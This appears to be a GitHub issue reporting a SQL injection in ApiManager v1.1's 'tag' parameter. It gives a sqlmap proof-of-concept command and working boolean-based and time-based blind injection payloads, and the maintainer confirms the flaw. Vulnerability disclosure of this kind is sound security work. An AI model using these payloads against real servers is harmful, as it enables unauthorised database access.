ApiManager icon indicating copy to clipboard operation
ApiManager copied to clipboard
verified publisher icon gongwalker

ApiManager v1.1 sql injection

Open mukeers opened this issue 4 years ago • 1 comments

poc : python3 sqlmap.py - u "http://localhost/index.php?act=api&tag=8"

sqlmap identified the following injection point(s) with a total of HTTP(s) requests:

Parameter: tag (GET)

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: act=api&tag=8' AND 5773=5773 AND 'aeqS'='aeqS

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: act=api&tag=8' AND (SELECT 2616 FROM (SELECT(SLEEP(5)))Uikd) AND 'WWaT'='WWaT

mukeers avatar Nov 10 '21 13:11 mukeers

Thank you for your feedback. SQL injection exists in the apimanger for version. Please use the golang version.

gongwalker avatar Nov 13 '21 12:11 gongwalker